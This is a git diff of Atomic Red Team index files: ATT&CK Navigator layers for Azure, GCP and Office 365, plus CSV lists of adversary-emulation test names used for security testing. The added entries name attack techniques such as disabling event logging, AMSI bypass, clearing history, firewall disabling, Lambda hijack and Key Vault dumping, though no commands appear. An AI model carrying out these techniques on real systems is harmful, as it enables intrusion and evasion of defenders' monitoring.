+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Indexes-CSV/iaas-index.csv

@@ -21,6 +21,8 @@ discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumer
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
+discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
+discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -44,3 +46,5 @@ collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Acces
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
+execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
+execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell

atomics/Indexes/Indexes-CSV/index.csv

@@ -89,8 +89,11 @@ defense-evasion,T1562.009,Impair Defenses: Safe Boot Mode,1,Safe Mode Boot,2a783
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
-defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
@@ -128,6 +131,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
+defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
@@ -154,6 +158,7 @@ defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Cl
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Clear PowerShell Session History,22c779cd-9445-4d3e-a136-f75adbf0315f,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -231,6 +236,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
@@ -256,6 +264,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,25,ESXi - Set Firewall to PASS Traffic,a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
 defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
@@ -392,6 +401,10 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,Disable .NET Eve
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,8,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,9,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,10,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd,fdac1f79-b833-4bab-b4a1-11b1ed676a4b,command_prompt
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,11,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell,b42c1f8c-399b-47ae-8fd8-763181395fee,powershell
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,12,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd,110b4281-43fe-405f-a184-5d8eaf228ebf,command_prompt
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,13,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell,4d61779d-be7f-425c-b560-0cafb2522911,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1070,Indicator Removal on Host,2,Indicator Manipulation using FSUtil,96e86706-6afd-45b6-95d6-108d23eaf2e9,powershell
 defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -514,6 +527,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Dis
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -752,7 +769,6 @@ privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modif
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
 privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -838,6 +854,7 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
 privilege-escalation,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 privilege-escalation,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 privilege-escalation,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -988,6 +1005,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
+execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
@@ -1054,9 +1072,11 @@ execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,S
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,6,Command prompt writing script to file then executes it,00682c9f-7df4-4df8-950b-6dcaaa3ad9af,command_prompt
+execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
 execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
+execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
 execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
